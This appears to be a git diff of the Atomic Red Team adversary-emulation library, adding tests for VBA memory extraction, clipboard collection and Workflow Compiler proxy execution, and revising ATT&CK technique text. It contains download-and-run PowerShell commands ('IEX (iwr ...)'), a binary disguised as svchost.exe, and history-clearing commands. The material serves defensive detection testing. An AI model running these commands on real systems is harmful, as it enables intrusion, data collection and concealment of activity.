+Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)
Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.
@@ -12,6 +12,8 @@ Adversaries may use VB payloads to execute malicious commands. Common malicious
- [Atomic Test #2 - Encoded VBS code execution](#atomic-test-2---encoded-vbs-code-execution)
+- [Atomic Test #3 - Extract Memory via VBA](#atomic-test-3---extract-memory-via-vba)
+
@@ -112,4 +114,57 @@ Write-Host "You will need to install Microsoft Word (64-bit) manually to meet th
+
+
+
+## Atomic Test #3 - Extract Memory via VBA
+This module attempts to emulate malware authors utilizing well known techniques to extract data from memory/binary files. To do this
+we first create a string in memory then pull out the pointer to that string. Finally, it uses this pointer to copy the contents of that
+memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.bin.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| ms_product | Maldoc application Word | String | Word|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Microsoft #{ms_product} must be installed
+##### Check Prereq Commands:
+```powershell
+try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+} catch { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
+```
+
+
+
+
diff --git a/atomics/T1059.005/T1059.005.yaml b/atomics/T1059.005/T1059.005.yaml
index 53b543be..73a171ac 100644
--- a/atomics/T1059.005/T1059.005.yaml
+++ b/atomics/T1059.005/T1059.005.yaml
@@ -61,7 +61,7 @@ atomic_tests:
name: powershell
- name: Extract Memory via VBA
- auto_generated_guid:
+ auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6
description: |
This module attempts to emulate malware authors utilizing well known techniques to extract data from memory/binary files. To do this
we first create a string in memory then pull out the pointer to that string. Finally, it uses this pointer to copy the contents of that
diff --git a/atomics/T1070.003/T1070.003.md b/atomics/T1070.003/T1070.003.md
index 380be0f8..0d630a36 100644
--- a/atomics/T1070.003/T1070.003.md
+++ b/atomics/T1070.003/T1070.003.md
@@ -1,10 +1,16 @@
# T1070.003 - Clear Command History
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1070/003)
-In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. macOS and Linux both keep track of the commands users type in their terminal so that users can retrace what they've done.
+In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
-These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.
+On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.
-Adversaries can use a variety of methods to prevent their own commands from appear in these logs, such as clearing the history environment variable (unset HISTFILE), setting the command history size to zero (export HISTFILESIZE=0), manually clearing the history (history -c), or deleting the bash history file rm ~/.bash_history.
+Adversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history.
+
+On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.
+
+The PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)
+
+Adversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
## Atomic Tests
diff --git a/atomics/T1095/T1095.md b/atomics/T1095/T1095.md
index 4c42e643..625bd04f 100644
--- a/atomics/T1095/T1095.md
+++ b/atomics/T1095/T1095.md
@@ -2,7 +2,8 @@
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1095)
Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
-ICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.
+ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution)
+ Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.
## Atomic Tests
diff --git a/atomics/T1115/T1115.md b/atomics/T1115/T1115.md
index f2b17cd7..ddfcb084 100644
--- a/atomics/T1115/T1115.md
+++ b/atomics/T1115/T1115.md
@@ -12,6 +12,8 @@ In Windows, Applications can access clipboard data by using the Windows API.(Cit
- [Atomic Test #3 - Execute commands from clipboard](#atomic-test-3---execute-commands-from-clipboard)
+- [Atomic Test #4 - Collect Clipboard Data via VBA](#atomic-test-4---collect-clipboard-data-via-vba)
+
@@ -92,4 +94,56 @@ $(pbpaste)
+
+
+
+## Atomic Test #4 - Collect Clipboard Data via VBA
+This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| ms_product | Maldoc application Word | String | Word|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA"
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Microsoft #{ms_product} must be installed
+##### Check Prereq Commands:
+```powershell
+try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+} catch { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
+```
+
+
+
+
diff --git a/atomics/T1115/T1115.yaml b/atomics/T1115/T1115.yaml
index dce7f02a..f8191383 100644
--- a/atomics/T1115/T1115.yaml
+++ b/atomics/T1115/T1115.yaml
@@ -37,7 +37,7 @@ atomic_tests:
$(pbpaste)
name: bash
- name: Collect Clipboard Data via VBA
- auto_generated_guid:
+ auto_generated_guid: 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52
description: |
This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt
supported_platforms:
diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md
index eaace638..51d74750 100644
--- a/atomics/T1135/T1135.md
+++ b/atomics/T1135/T1135.md
@@ -2,9 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1135)
Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
-File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the net view \\remotesystem command. It can also be used to query shared drives on the local system using net share.
-
-Cloud virtual networks may contain remote network shares or file storage services accessible to an adversary after they have obtained access to a system. For example, AWS, GCP, and Azure support creation of Network File System (NFS) shares and Server Message Block (SMB) shares that may be mapped on endpoint or cloud-based systems.(Citation: Amazon Creating an NFS File Share)(Citation: Google File servers on Compute Engine)
+File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the net view \\remotesystem command. It can also be used to query shared drives on the local system using net share.
## Atomic Tests
diff --git a/atomics/T1201/T1201.md b/atomics/T1201/T1201.md
index 42998236..f81368ed 100644
--- a/atomics/T1201/T1201.md
+++ b/atomics/T1201/T1201.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1201)
Adversaries may attempt to access detailed information about the password policy used within an enterprise network. Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This would help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
-Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies.(Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies)
+Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies.(Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies)
## Atomic Tests
diff --git a/atomics/T1218.002/T1218.002.md b/atomics/T1218.002/T1218.002.md
index 82a817b0..8284a94a 100644
--- a/atomics/T1218.002/T1218.002.md
+++ b/atomics/T1218.002/T1218.002.md
@@ -1,10 +1,12 @@
# T1218.002 - Control Panel
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1218/002)
-Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013)
+Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
-For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL)
+Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)
-Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.
+Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.
+
+Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not export CPlApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel is executed. CPL files not exporting CPlApplet are not directly executable.(Citation: ESET InvisiMole June 2020)
## Atomic Tests
diff --git a/atomics/T1218.003/T1218.003.md b/atomics/T1218.003/T1218.003.md
index d82855fd..6fcb3da3 100644
--- a/atomics/T1218.003/T1218.003.md
+++ b/atomics/T1218.003/T1218.003.md
@@ -4,7 +4,7 @@
Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.
-CMSTP.exe can also be abused to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)
+CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)
## Atomic Tests
diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md
index 256f8447..738c180b 100644
--- a/atomics/T1218/T1218.md
+++ b/atomics/T1218/T1218.md
@@ -14,6 +14,10 @@
- [Atomic Test #5 - ProtocolHandler.exe Downloaded a Suspicious File](#atomic-test-5---protocolhandlerexe-downloaded-a-suspicious-file)
+- [Atomic Test #6 - Microsoft.Workflow.Compiler.exe Payload Execution](#atomic-test-6---microsoftworkflowcompilerexe-payload-execution)
+
+- [Atomic Test #7 - Renamed Microsoft.Workflow.Compiler.exe Payload Executions](#atomic-test-7---renamed-microsoftworkflowcompilerexe-payload-executions)
+
@@ -214,4 +218,90 @@ write-host "Install Microsoft Word or provide correct path."
+
+
+
+## Atomic Test #6 - Microsoft.Workflow.Compiler.exe Payload Execution
+Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| xml_payload | XML to execution | path | PathToAtomicsFolder\T1218\src\T1218.xml|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Set-Location -path PathToAtomicsFolder\T1218\src ;
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe "#{xml_payload}" output.txt
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: .Net must be installed for this test to work correctly.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe ) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+write-host ".Net must be installed for this test to work correctly."
+```
+
+
+
+
+
+
+
+## Atomic Test #7 - Renamed Microsoft.Workflow.Compiler.exe Payload Executions
+Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| xml_payload | XML to execution | path | PathToAtomicsFolder\T1218\src\T1218.xml|
+| renamed_binary | renamed Microsoft.Workflow.Compiler | path | PathToAtomicsFolder\T1218\src\svchost.exe|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Set-Location -path PathToAtomicsFolder\T1218\src ;
+#{renamed_binary} #{xml_payload} output.txt
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: .Net must be installed for this test to work correctly.
+##### Check Prereq Commands:
+```powershell
+Copy-Item C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe "#{renamed_binary}" -Force
+if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+write-host "you need to rename workflow complier before you run this test"
+```
+
+
+
+
diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml
index 5ead4c3e..1431cf7e 100644
--- a/atomics/T1218/T1218.yaml
+++ b/atomics/T1218/T1218.yaml
@@ -124,6 +124,7 @@ atomic_tests:
command: |
"#{microsoft_wordpath}\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"
- name: Microsoft.Workflow.Compiler.exe Payload Execution
+ auto_generated_guid: 7cbb0f26-a4c1-4f77-b180-a009aa05637e
description: |
Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe
supported_platforms:
@@ -148,6 +149,7 @@ atomic_tests:
name: powershell
elevation_required: false
- name: Renamed Microsoft.Workflow.Compiler.exe Payload Executions
+ auto_generated_guid: 4cc40fd7-87b8-4b16-b2d7-57534b86b911
description: |
Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe
supported_platforms:
diff --git a/atomics/T1222.001/T1222.001.md b/atomics/T1222.001/T1222.001.md
index 4dbeacfc..3559d65b 100644
--- a/atomics/T1222.001/T1222.001.md
+++ b/atomics/T1222.001/T1222.001.md
@@ -4,7 +4,7 @@
Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)
-Adversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).
+Adversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).
## Atomic Tests
diff --git a/atomics/T1543.002/T1543.002.md b/atomics/T1543.002/T1543.002.md
index 79c0e9b6..c9bfec54 100644
--- a/atomics/T1543.002/T1543.002.md
+++ b/atomics/T1543.002/T1543.002.md
@@ -8,7 +8,7 @@ Systemd utilizes configuration files known as service units to control how servi
* ExecReload directive covers when a service restarts.
* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.
-Adversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at recurring intervals, such as at system boot.(Citation: Anomali Rocke March 2019)(Citation: gist Arch package compromise 10JUL2018)(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018)
+Adversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at system boot.(Citation: Anomali Rocke March 2019)
While adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)
diff --git a/atomics/T1546.011/T1546.011.md b/atomics/T1546.011/T1546.011.md
index 067c7d43..cb83a0d9 100644
--- a/atomics/T1546.011/T1546.011.md
+++ b/atomics/T1546.011/T1546.011.md
@@ -14,7 +14,7 @@ Custom databases are stored in:
* %WINDIR%\AppPatch\custom & %WINDIR%\AppPatch\AppPatch64\Custom and
* hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom
-To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).
+To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).
Utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.
diff --git a/atomics/T1546.012/T1546.012.md b/atomics/T1546.012/T1546.012.md
index 03389b7d..df5c047b 100644
--- a/atomics/T1546.012/T1546.012.md
+++ b/atomics/T1546.012/T1546.012.md
@@ -1,10 +1,10 @@
# T1546.012 - Image File Execution Options Injection
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1546/012)
-Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IEFO) debuggers. IEFOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010)
+Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)
-IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IEFO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
+IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
diff --git a/atomics/T1547.001/T1547.001.md b/atomics/T1547.001/T1547.001.md
index 4293ddc0..09ec8aed 100644
--- a/atomics/T1547.001/T1547.001.md
+++ b/atomics/T1547.001/T1547.001.md
@@ -5,26 +5,30 @@
Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.
The following run keys are created by default on Windows systems:
+
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
-The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018)
+Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018)
The following Registry keys can be used to set startup folder items for persistence:
+
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
The following Registry keys can control automatic startup of services during boot:
+
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
+
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
diff --git a/atomics/T1548.002/T1548.002.md b/atomics/T1548.002/T1548.002.md
index cd1a25c4..98064122 100644
--- a/atomics/T1548.002/T1548.002.md
+++ b/atomics/T1548.002/T1548.002.md
@@ -1,4 +1,4 @@
-# T1548.002 - Bypass User Access Control
+# T1548.002 - Bypass User Account Control
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1548/002)
